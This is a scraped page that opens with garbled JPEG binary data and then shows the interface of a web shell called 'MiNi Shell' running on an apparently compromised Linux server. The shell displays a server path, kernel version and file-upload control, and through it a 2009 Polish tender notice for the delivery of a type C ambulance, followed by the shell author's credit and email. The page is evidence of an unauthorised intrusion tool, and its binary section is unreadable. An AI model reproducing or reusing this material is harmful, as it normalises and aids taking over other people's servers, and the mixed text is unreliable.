JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090213/28218-N-2009.html

<p class="kh_header"><b>Ząbkowice Śląskie: Dostawa - Ambulansu medycznego typu C.</b><br>
<b>Numer ogłoszenia: 28218 - 2009; data zamieszczenia: 13.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Ząbkowicki , ul. Sienkiewicza 11, 57-200 Ząbkowice Śląskie, woj. dolnośląskie, tel. 074 8162800, faks 074 8162850.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zabkowicki.powiat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa - Ambulansu medycznego typu C..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa fabrycznie nowego Ambulansu medycznego typu C wyprodukowanego w II półroczu 2008r wzwyż.
2. Dane ogólne, techniczne, wyposażenie oraz warunki gwarancji określa specyfikacja techniczna 
    stanowiąca załącznik nr 1 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 34.11.41.22-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda wniesienia wadium w wysokości 5.000 zł.
2. Wadium może być wnoszone w jednej lub kilku następujących formach: 
    1) w pieniądzu : 
    2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z 
        tym że poręczenie kasy jest zawsze poręczeniem pieniężnym:
    3) gwarancjach bankowych:
    4) gwarancjach ubezpieczeniowych: 
    5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt. 2 ustawy z 
       dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst.jedn.
        Dz. U. z 2007r. Nr 42, poz.275). 
3. Wadium wnoszone w pieniądzu wpłaca się przelewem  na rachunek bankowy Zamawiającego
     nr 10 9533 0004 2001 0002 6260 0007 w Banku Spółdzielczym w Ząbkowicach Śl.       
     Wykonawca dołącza do oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego 
     przelewu. Na poleceniu przelewu należy wpisać - Ambulansu medycznego typu C. 
     W pozostałych przypadkach wymagane jest dołączenie oryginału dokumentu wystawionego na 
     rzecz Zamawiającego. Dokumenty, o których mowa w  pkt.2 ppkt. 2 -5  muszą zachowywać 
     ważność przez cały okres, w którym Wykonawca jest związany ofertą.
 4.Wadium wnosi się przed upływem terminu składania ofert. Przy czym za termin wniesienia wadium
     w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku Zamawiającego.  
 5. Z udziału w postępowaniu wyklucza się wykonawców, którzy nie wnieśli wadium w wymaganym
     terminie.   7. Zamawiający dokona zwrotu wadium zgodnie z warunkami określonymi w art. 46 ustawy   
     Prawo zamówień publicznych.
 8. Zamawiający żąda ponownego wniesienia wadium przez wykonawców, którym zwrócono   
     wadium na podstawie art. 46 ust. 2 pkt. 2 i 3 ustawy Pzp, jeżeli w wyniku ostatecznego  
     rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty.
     Wykonawcy wnoszą  wadium w terminie określonym przez Zamawiającego.
 9. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli na wezwanie Wykonawcy, który 
     określonym przez Zamawiającego terminie, o którym mowa w art. 26 ust. 3 nie złożył dokumentów 
     lub oświadczeń, o których mowa  w art. 25 ust. 1, lub którzy nie złożyli pełnomocnictw, albo złożyli 
     wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa w art.25.ust.1 
     zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym  
     terminie, chyba że mimo złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby 
     unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty  
     powinny potwierdzać spełnienie przez Wykonawcę warunków udziału w postępowaniu oraz 
     spełnienie przez oferowane roboty budowlane wymagań określonych przez Zamawiającego, nie 
     później niż w dniu. w którym upłynął termin składania ofert.
10. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została   
     wybrana :
    1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w  
        ofercie,
    2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
    3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po   
        stronie wykonawcy,<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w 
    art.22 ust.1 ustawy Prawo zamówień publicznych tj,
    1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy 
        nakładają obowiązek posiadania takich uprawnień,
    2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami 
        zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów    
        do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
    3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
    4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na mocy art. 24 ust.1 i 2 
        ustawy Pzp.
2. Wykonawcą może być osoba fizyczna, osoba prawna, jednostka organizacyjna nieposiadającą 
     osobowości prawnej albo podmioty te występujące wspólnie. W przypadku złożenia oferty 
     wspólnej  warunek  pkt.4 muszą spełniać wszyscy Wykonawcy składający ofertę wspólną, 
     warunek pkt.2 dowolny Wykonawca.
3. W przypadku składania oferty przez Wykonawców występujących wspólnie, Wykonawcy 
    ustanowią pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo 
     reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
     Pełnomocnictwo może być przedłożone wyłącznie w formie oryginału lub kopii poświadczonej 
     przez notariusza.
4. Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub 
    nienależyte wykonanie zobowiązań   5. W przypadku dokonania wyboru oferty Wykonawcy występującego wspólnie przed przystąpieniem 
    do zawarcia umowy o zamówienie publiczne przedłożona zostanie umowa regulującą współpracę 
    wykonawców występujących wspólnie. Termin, na jaki została zawarta umowa wykonawców nie 
    może być krótszy od terminu określonego na wykonanie zamówienia.   6. Opis sposobu dokonywania oceny spełnienia warunków:
    Zamawiający dokonana oceny na podstawie analizy dokumentów dołączonych do oferty, które 
    zostały określone w Specyfikacji Istotnych Warunków Zamówienia zgodnie z formułą spełnia- nie 
    spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A.W celu wykazania spełnienia warunków udziału w postępowaniu, określonych w części.V.pkt.1 
SIWZ, każdy z Wykonawców powinien przedłożyć wraz z ofertą następujące dokumenty i 
oświadczenia: 
1. Wypełniony formularz oferty - z wykorzystaniem wzoru zał. nr 2 do SIWZ,
2. Specyfikacja techniczna  oferowanego ambulansu - załącznik własny Wykonawcy,
3. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji
    działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do
    ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem 
    terminu składania ofert, 
4. Dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z przepisów 
    prawa lub innych dokumentów rejestrowych,
     5. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału 
         Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające 
         odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie 
         zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie 
         lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego 
         organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
6. Aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego 
    organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 
    ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania 
    ofert,.
7. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9, 
    wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
 8. Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art.22.
     ust.1 oraz art. 24 ust.1 i 2  ustawy Prawo zamówień publicznych - z wykorzystaniem wzoru 
    zał. nr 3 do SIWZ. 
9. Wykaz wykonanych co najmniej 3 dostaw, w okresie ostatnich trzech lat przed dniem wszczęcia 
    niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest
    krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym 
    przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z 
     dokumentami potwierdzającymi, że dostawy te zostały wykonane należycie - z wykorzystaniem 
     wzoru załącznik nr 4 do  SIWZ. 
    Przez dostawę odpowiadającą zamówieniu, należy rozumieć dostawę ambulansu medycznego na 
    wartość min.200.000,00 zł brutto.
10.Polisę ubezpieczeniową lub inny dokument ubezpieczenia potwierdzający, że Wykonawca 
    ubezpieczony od odpowiedzialności cywilnej w zakresie  prowadzonej działalności gospodarczej na 
    kwotę nie mniejszą niż 240.000 zł. na okres wykonania zamówienia. 
11. Zaakceptowany projekt umowy - załącznik nr 5 do SIWZ.
12. Dowód wniesienia wadium. 
B. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:  1. Zamiast dokumentów, o których mowa w pkt. VI.A.3,5 i 7  składa dokument lub dokumenty, 
     wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, 
     że:      1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy 
         przed upływem terminu składania ofert.      2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że 
         uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności 
         lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 
         3 miesiące przed upływem terminu składania ofert.      3) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 
         miesięcy przed upływem terminu składania ofert.  2. Zamiast dokumentu, o którym mowa w pkt.VI.A.6 składa zaświadczenie właściwego organu
    sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty 
   dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych - 
     wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.   3. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce
     zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt.1 i 2 zastępuje się je 
     dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem 
     sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego 
     odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce 
     zamieszkania - wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt. VI. 
     A.3,5,6 i 7
C. Dokumenty wymagane w przypadku składania oferty wspólnej:   1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla 
     ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w 
     postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy.  2. Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt.V.1.3, VI.A.5-7 dla każdego 
  partnera z osobna, pozostałe dokumenty składane są wspólnie. 
Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii o potwierdzonych za zgodność przez osobę uprawnioną do składania oświadczeń woli w imieniu Wykonawcy z dopiskiem -za zgodność z oryginałem-. 
W innym przypadku należy dołączyć stosowne pełnomocnictwo..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.zabkowicki.powiat.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe
ul.Sienkiewcza 11, 57-200 Zabkowice Sl. pok.110.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.02.2009 godzina 09:00, miejsce: Powiat Ząbkowicki
 ul. Sienkiewicza 11
  57-200 Ząbkowice Śl.
Sekretariat pok.202.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com